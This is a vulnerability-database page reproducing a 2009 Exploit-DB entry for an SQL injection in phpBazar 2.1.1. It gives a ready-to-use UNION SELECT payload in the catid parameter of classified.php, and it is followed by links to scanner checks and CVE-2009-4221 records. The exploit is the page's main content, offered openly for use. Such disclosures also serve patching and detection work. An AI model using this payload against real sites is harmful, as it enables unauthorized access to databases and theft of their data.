Lucene search
MizoZEDB-ID:10245HistoryNov 28, 2009 - 12:00 a.m.
phpBazar 2.1.1fix - 'cid' SQL Injection
2009-11-2800:00:00
MizoZ
www.exploit-db.com
18
AI Score
7.4
Confidence
Low
/*
Author : MizoZ [from MA]
Group : EvilWay, evilway[at]mail[dot]com
Email : mizozx[at]gmail[dot]com
Greetz : Zuka, Dyle !!
MABROOK L3IIIIIIIIIID
*/
The vulnerability is in the $_GET['catid'] , exploit :
http://server/classified.php?catid=2+and+1=0+union+all+select+1,2,3,4,5,6,7--Related
openvas
openvas
phpBazar <= 2.1.1 SQLi Vulnerability - Active Check
2010-02-17 00:00:00
phpBazar 'classified.php' SQL Injection Vulnerability
2010-02-17 00:00:00
prion
prion
Sql injection
2009-12-07 17:30:00
nvd
nvd
CVE-2009-4221
2009-12-07 17:30:00
cvelist
cvelist
CVE-2009-4221
2009-12-07 17:00:00
cve
cve
CVE-2009-4221
2009-12-07 17:30:00